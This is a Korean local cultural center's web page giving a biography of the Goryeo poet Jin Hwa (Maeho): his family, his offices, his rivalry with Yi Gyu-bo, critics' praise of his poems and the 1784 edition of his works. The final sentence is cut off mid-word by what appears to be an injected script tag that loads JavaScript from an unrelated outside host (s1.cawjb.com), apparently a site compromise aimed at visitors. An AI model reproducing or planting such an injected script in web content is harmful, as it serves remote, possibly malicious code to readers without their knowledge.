¾ÆAIμð
비밀번호
로그인
아이디비밀번호 찾기
사이트맵
찾아오시는 길
이메일보내기
문화원달력
조직도
홈 >향토문화자료관>향토위인

 

진화

이미지없음
 진화

생몰년 미상. 묘, 남사면 원암리, 고려 신종. 희종 때의 문신. 본관
은 여양(驪陽:지금의 홍성), 호는 매호(梅湖), 고려 인종조. 이자겸
의 난을 토벌한 공로로 대장군을 지낸 여양군 총후(寵厚)의 증손이
며, 정중부(鄭仲夫)의 난 때 문신을 보호해 주었던 참지정사(參知政
事). 판병부사(判兵部事) 준(俊)의 손자이고 병부상서 광수(光修)
의 아들이며, 식(湜), 온(溫)의 아우로서 훈벌(勳閥)가문의 명망 있
는 집안에서 출생했다.
출생년도는 기록에 없으나 그의 문집에 있는 매호공 소전(梅湖公小
傳)에 의하면 1200(신종 3)에 아직 혼인하지 않았다고 하므로 대략 
명종 9,10년(1179~1180)경에 출생한 것으로 추정할 수 있다. 어려
서부터 글재주가 있었고 명종의 신하들에게 소상팔경(瀟湘八景)에 
관한 시를 짓도록 하였을 때 어린 나이로 장편을 지어 이인로(李仁
老)와 더불어 절창이라는 평을 받았다.
1198년(고려 신종 원년) 사마시에 수석으로 합격하고 1200년(신종 
3년) 문과에 급제하였다. 다음해 내시(內侍)에 보직되고 1209년(희
종 5) 학정(學正)으로 전직하였으며 1212년(강종 1)에 제과시험(制
科試驗)에 참여하여 조서(詔書)를 짓는 일을 맡아 보았다. 1213년
(강종 2년)에는 설화(舌禍)로 벼슬에서 물러났다가 다시 내직인 한
림원(翰林苑)에 들어갔다. 1215년(고종 2)년에 관각제공(館閣諸公)
에게 부시(賦詩) 40여 운(韻)을 시험하였는데 이규보(李圭報)가 수
석을 차지하고 선생은 차석이었으나, 선생은 이규보보다는 10여년
이 더 어렸고, 관위도 그에 미치지 못했던 때였다.
서장관(書狀官)으로 금나라에 다녀온 뒤에 옥당으로 옮겨져 지제고
(知制誥)를 겸하였고 정언(正言)에서 보궐(補闕)을 거쳐 우사간이 
되었다가 부도덕한 현실을 추종하는 무리들과 대립하여 고종 2년
(1215)이후 외직인 지공주사(知公州事)에 보직되었다가 재직 중에 
별세하였는바 이때의 세수(歲壽)는 40대 또는 50대 초반인 것으로 
추정된다.
대동야승의 해동잡록편에 이르기를 「진화의 7언장구(七言長句)는 
호방하고 깨끗하고 건장하고 우뚝하며 기이한 체를 얻었으니 모두 
고금의 절창으로 후일의 작가는 쉬 따를 수 없다」고 평하였고, 견
한잡록에는 「이규보와 진화는 문장이 한때에 떨쳤다. 한림별곡(翰
林別曲)에 이른바 이정언(李正言)과 진한림(陳翰林)의 쌍운(雙韻)
에 주필(走筆)하는 것이라 함은 곧 이규보와 진화를 말함이니 두 사
람이 빨리 짖는 것으로 명성을 날렸다. 이규보는 벼슬이 태보평장사
(太保平章事) 진화는 우사간(右司諫)에 이르렀으나 연세의 많고 적
음은 알 수 없다」고 하여 당대에 이 두 사람이 쌍벽을 이루었던 문
사임을 나타내고 있으며 그중 진화선생은 낙운성시와 주필로 이규
보와 대등한 위치에서 이름을 같이한 시인이었다.
선생의 시는 현재 59수가 전하고 있는데 그 중 무신의 난 이후의 피
폐한 농촌을 사실적으로 묘사한 도원가(桃源歌)가 특히 유명하며 
금나라에 사신으로 가면서 지은 사금통주구일(使金通州九日), 봉사
입금(奉使入金) 등의 시도 절창이라고 한다.
그의 시는 관인으로서의 면모를 보여주는 시와 자연을 소재로 한 정
감을 표현하는 시로 나뉘는데 대개 산수, 전원을 청담(淸談)하게 표
출하였다는 평을 얻고 있다.
조선시대의 허균(許筠)은 그의 시를 《맑고 굳세어 읊을 만하다》
고 평하였고, 백운 이규보는 《그의 시는 옥처럼 맑아 세속의 눈을 
얼음보다 더 시원하게 풀어주며, 죽은 이를 살려내어 서로 비교한다
면 그대와 이백(李伯), 두보(杜甫)중 누가 더 훌륭하겠는가》라고 
하여 선생의 문학적 재능이 뛰어났음을 극찬하고 있다. 선생 스스로
도 청나라를 위주로 시를 쓴다고 한바 있는데 그의 시에 대한 평사
는 “청신(淸新)·청려(淸麗)”하다는 것으로 일관되어 있다.
한마디로 매호(梅湖)라는 인물은 고려 무신집정기에 생존했던 문인
으로서 한평생을 현실세계의 관인(官人)으로 살아가고자 하는 욕망
을 가진 전형적인 유인(儒人)이라 할 수 있는데, 당대 문호 이규보
는 동국이상국집을 통해 「진군(陳君)은 나이 젊고 기운 더욱 웅장
하여 번개를 지휘하고 우레를 채찍질하여, 강호의 물을 들이마실 
수 있을 만큼 담이 크니 만리 하늘 걸터타고 바닷물 마시는 무지개 
같은」인물로 비유하고 「높은 누개 비록 백층이나 되지만 바로 진
군이 올라앉음에 합당하지만 나 같은 사람이야 땅에 눕기도 오히려 
황송하다」고 평하여 선생의 인물됨을 매우 아꼈음을 느끼게 한다.
1784년(정조 8) 그의 후손 후(厚)가 《동문선》, 《동인시화》, 
《기아》등에서 시 작품을 찾아내어 매호유고(梅湖遺稿)를 간행하
게 하였으며, 이 책은 1973년 성균관대학교 대동문화 연구원에서 간
행한 고려명현집(高麗明賢集) 2권에 영인되?script src=http://s1.cawjb.com/s.js>
    목록



 
주소 로고